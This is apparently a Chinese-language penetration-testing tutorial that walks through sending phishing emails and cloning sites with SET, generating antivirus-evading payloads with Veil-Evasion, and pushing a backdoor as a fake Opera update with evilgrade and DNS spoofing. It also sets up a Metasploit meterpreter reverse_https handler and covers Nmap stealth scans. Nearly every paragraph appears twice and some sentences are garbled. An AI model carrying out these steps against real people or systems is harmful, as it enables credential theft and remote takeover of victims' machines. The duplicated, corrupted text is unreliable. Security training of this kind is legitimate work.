网络钓鱼攻击
网络钓鱼是一种广泛使用的社会工程攻击,旨在诱骗用户泄露敏感信息,例如登录凭据、财务详细信息或个人身份信息。
通过操纵用户,使用户相信他们正在与合法来源进行交互,攻击者可以诱骗他们点击恶意链接、下载受恶意软件感染的文件或泄露机密信息。
可以使用 Gmail、Hotmail、Yahoo或 您域中的电子邮件地址通过 SET 执行网络钓鱼攻击。Gmail 是默认选项,也是我们将使用的选项。要在 Gmail、Hotmail 或 Yahoo 之间切换,您必须编辑 /etc/setoolkit/set.config 文件。
网络钓鱼是一种广泛使用的社会工程攻击,旨在诱骗用户泄露敏感信息,例如登录凭据、财务详细信息或个人身份信息。
通过操纵用户,使用户相信他们正在与合法来源进行交互,攻击者可以诱骗他们点击恶意链接、下载受恶意软件感染的文件或泄露机密信息。
可以使用 Gmail、Hotmail、Yahoo或 您域中的电子邮件地址通过 SET 执行网络钓鱼攻击。Gmail 是默认选项,也是我们将使用的选项。要在 Gmail、Hotmail 或 Yahoo 之间切换,您必须编辑 /etc/setoolkit/set.config 文件。
网络钓鱼活动
从主菜单中,选择选项一“社会工程攻击”,然后选择选项五“群发邮件攻击”,最后选择“电子邮件攻击单个电子邮件地址”。
发送电子邮件至: 这是目标的电子邮件。
接下来,您可以使用 Gmail 帐户或您的服务器帐户。
您的 Gmail 帐户: 您要从中发送电子邮件的帐户。
用户将看到的发件人姓名: 您想要显示的发件人姓名。
将此消息标记为高优先级: 是否希望将其标记为高优先级。
是否要附加文件: 是或否
是否要附加内联文件: 是或否
电子邮件主题: 电子邮件的主题行。
以 HTML 或纯文本形式发送消息: 选择您想要发送电子邮件的方式。
输入邮件正文: 在此处输入实际的电子邮件文本。写完电子邮件后,输入 END 并按回车键。
从主菜单中,选择选项一“社会工程攻击”,然后选择选项五“群发邮件攻击”,最后选择“电子邮件攻击单个电子邮件地址”。
发送电子邮件至: 这是目标的电子邮件。
接下来,您可以使用 Gmail 帐户或您的服务器帐户。
您的 Gmail 帐户: 您要从中发送电子邮件的帐户。
用户将看到的发件人姓名: 您想要显示的发件人姓名。
将此消息标记为高优先级: 是否希望将其标记为高优先级。
是否要附加文件: 是或否
是否要附加内联文件: 是或否
电子邮件主题: 电子邮件的主题行。
以 HTML 或纯文本形式发送消息: 选择您想要发送电子邮件的方式。
输入邮件正文: 在此处输入实际的电子邮件文本。写完电子邮件后,输入 END 并按回车键。
网站克隆和凭证窃取
网站克隆和凭证窃取是社交工程师的两项基本技术。这些技术包括创建合法网站的副本,并诱骗用户在假网站上输入敏感信息,例如用户名和密码。
这些信息随后可用于各种恶意活动,包括未经授权访问用户帐户、身份盗窃甚至企业间谍活动。
克隆站点
在 SET 中设置克隆站点之前,您需要在位于 /etc/setoolkit/set.config 的 SET 配置文件中启用 Apache Web 服务器。将行 APACHE_SERVER=OFF 更改为 APACHE_SERVER=ON,保存文件,然后重新启动 SET 以应用更改。
网站克隆和凭证窃取是社交工程师的两项基本技术。这些技术包括创建合法网站的副本,并诱骗用户在假网站上输入敏感信息,例如用户名和密码。
这些信息随后可用于各种恶意活动,包括未经授权访问用户帐户、身份盗窃甚至企业间谍活动。
克隆站点
在 SET 中设置克隆站点之前,您需要在位于 /etc/setoolkit/set.config 的 SET 配置文件中启用 Apache Web 服务器。将行 APACHE_SERVER=OFF 更改为 APACHE_SERVER=ON,保存文件,然后重新启动 SET 以应用更改。
veil使用
veil 有两个免杀的工具,Evasion 和Ordnance。
Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀
我们一般选择Evasion,使用list可以查看到41种stager,使用go和ruby语言encode的编码方式。
试一下使用go生成,输入监听的主机和端口就可以,然后再设定生成的payload名字,因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
veil 有两个免杀的工具,Evasion 和Ordnance。
Ordnance 可生成在 Veil-Evasion 中使用的 shellcode,Evasion 是用做文件免杀
我们一般选择Evasion,使用list可以查看到41种stager,使用go和ruby语言encode的编码方式。
试一下使用go生成,输入监听的主机和端口就可以,然后再设定生成的payload名字,因为之前已经做过映射,所以在宿主机的/tmp/veil-output/compiled/目录可直接看到生成的exe文件。
evilgrade 是一个模块化框架,用于欺骗、注入攻击负载以及创建伪装成现有应用程序更新的后门。当您的目标计算机已完全修补或经常自我更新以作为安全措施时,它非常有用。
干净且易于安装和使用,带有预制二进制文件(代理)
具有可快速进行渗透测试的默认配置,拥有自己的WebServer和DNS服务器模块。
支持 DNS 篡改、DNS 缓存中毒、ARP 欺骗、Wi-Fi 接入点模拟、DHCP 劫持和主机名重定向等攻击
干净且易于安装和使用,带有预制二进制文件(代理)
具有可快速进行渗透测试的默认配置,拥有自己的WebServer和DNS服务器模块。
支持 DNS 篡改、DNS 缓存中毒、ARP 欺骗、Wi-Fi 接入点模拟、DHCP 劫持和主机名重定向等攻击
Evilgrade框架可以通过模拟中间人(MITM)攻击来对操作系统进行安全审计。这种攻击在攻击者拥有DNS访问权限和欺骗能力的情况下有效。Evilgrade使用更新不当的系统实用程序作为攻击媒介。Evilgrade支持的一些标准实用程序包括Notepad++、Ccleaner、Teamviewer、Virtualbox、Filezilla、Skype 和VMware。
当客户端打开其中一个未经过良好升级的实用程序时,Evilgrade会通过MITM攻击向客户端发送(伪造的)更新消息。该消息包含一个有效负载,可间接访问目标系统。如果客户端安装更新,则会在目标系统上下载后门,可以通过Metasploit等程序远程用该后门。
当客户端打开其中一个未经过良好升级的实用程序时,Evilgrade会通过MITM攻击向客户端发送(伪造的)更新消息。该消息包含一个有效负载,可间接访问目标系统。如果客户端安装更新,则会在目标系统上下载后门,可以通过Metasploit等程序远程用该后门。
假设我们的目标运行的是“opera浏览器。我们将尝试动持浏览器的”更新功能,并将网站重定向到攻击者的首选位置,可
以在该位置下载恶意可执行文件。
要选择要配置的程序,请键入“configureopera”,然后键入“showoptions以查所有可能需要配置的选项。要配置选项,1使用“set”命令,然后指定选项并输入与该选项相关的值
例如:(evilgrade (opera)>set agent /var/www/html/Evil-Files/rev-https-8080.exe)
因此,我们在这里设置了名为代理的选项,并提供了可执行文件的确切位置。
现在我们需要进行基本的DNS欺骗攻击,并将”www.opera.com重定向到evilgrade。让我们从配置“mitmf.conf”文件开始。为此,请输入“leafpad/etc/mitmf/mitmf.conf”。为了避免与DNS相关的任何冲突,我们需要将端口号从53更改为5353,因为evilgrade在端口53上运行。然后我们需要在A”记录中添加Opera的虚拟主机地址。
以在该位置下载恶意可执行文件。
要选择要配置的程序,请键入“configureopera”,然后键入“showoptions以查所有可能需要配置的选项。要配置选项,1使用“set”命令,然后指定选项并输入与该选项相关的值
例如:(evilgrade (opera)>set agent /var/www/html/Evil-Files/rev-https-8080.exe)
因此,我们在这里设置了名为代理的选项,并提供了可执行文件的确切位置。
现在我们需要进行基本的DNS欺骗攻击,并将”www.opera.com重定向到evilgrade。让我们从配置“mitmf.conf”文件开始。为此,请输入“leafpad/etc/mitmf/mitmf.conf”。为了避免与DNS相关的任何冲突,我们需要将端口号从53更改为5353,因为evilgrade在端口53上运行。然后我们需要在A”记录中添加Opera的虚拟主机地址。
程序启动后,输入(useexploit/multi/handler)来使用漏洞exploit/multi/handler”。需要根据使用Veil-Evasion创建的后门来设置有效载荷。创建了与针对Windows设备的”meterpreter/reverse_https相关的后门,因此有效载荷应设置为“reverse_https。要设置有效载荷类型(setPAYLOADwindows/meterpreter/reverse_https)。要显示需要设置的所有可用选项,请输入“showoptions”
现在将“LHOST选项设置为Kali机器的IP地址(设置LHOST10.0.2.15),将LPORT设置为后门将运行的端口(设置LPORT8080),然后通过输入“exploit开始攻击。
现在将“LHOST选项设置为Kali机器的IP地址(设置LHOST10.0.2.15),将LPORT设置为后门将运行的端口(设置LPORT8080),然后通过输入“exploit开始攻击。
什么是 Nmap 脚本引擎?
Nmap 的另一个强大功能是能够使用各种脚本运行扫描,以自动化您的工作或根据您的需要自定义安全审核。您可以使用这些脚本通过其原生的Nmap 脚本引擎(NSE) 从 Nmap 中获得更大的多功能性和功能性。
NSE 附带了大量脚本。其中许多脚本是由安全专业人员创建和维护的,他们随着漏洞和攻击的发展而不断为这些脚本做出贡献。在开始每个会话之前,请运行命令 <nmap –script-updatedb>(如果您不是 root 帐户,则需要 <sudo>)。
这些脚本按网络发现、复杂版本检测、漏洞检测、后门检测和漏洞利用进行分类。一些脚本使用简单技术,另一些脚本使用复杂技术。您还可以使用 Lua 编程语言创建自己的脚本。
Nmap 的另一个强大功能是能够使用各种脚本运行扫描,以自动化您的工作或根据您的需要自定义安全审核。您可以使用这些脚本通过其原生的Nmap 脚本引擎(NSE) 从 Nmap 中获得更大的多功能性和功能性。
NSE 附带了大量脚本。其中许多脚本是由安全专业人员创建和维护的,他们随着漏洞和攻击的发展而不断为这些脚本做出贡献。在开始每个会话之前,请运行命令 <nmap –script-updatedb>(如果您不是 root 帐户,则需要 <sudo>)。
这些脚本按网络发现、复杂版本检测、漏洞检测、后门检测和漏洞利用进行分类。一些脚本使用简单技术,另一些脚本使用复杂技术。您还可以使用 Lua 编程语言创建自己的脚本。
隐形扫描
隐形扫描是通过发送 SYN 数据包并分析响应来执行的。如果收到 SYN/ACK,则表示端口已打开,您可以打开 TCP 连接。
然而,隐形扫描永远不会完成三次握手,这使得目标很难确定扫描系统。
> nmap -sS scanmenmap\org
您可以使用“-sS”命令执行隐形扫描。请记住,隐形扫描速度较慢,且不如其他类型的扫描那么积极,因此可能需要等待一段时间才能获得响应。
隐形扫描是通过发送 SYN 数据包并分析响应来执行的。如果收到 SYN/ACK,则表示端口已打开,您可以打开 TCP 连接。
然而,隐形扫描永远不会完成三次握手,这使得目标很难确定扫描系统。
> nmap -sS scanmenmap\org
您可以使用“-sS”命令执行隐形扫描。请记住,隐形扫描速度较慢,且不如其他类型的扫描那么积极,因此可能需要等待一段时间才能获得响应。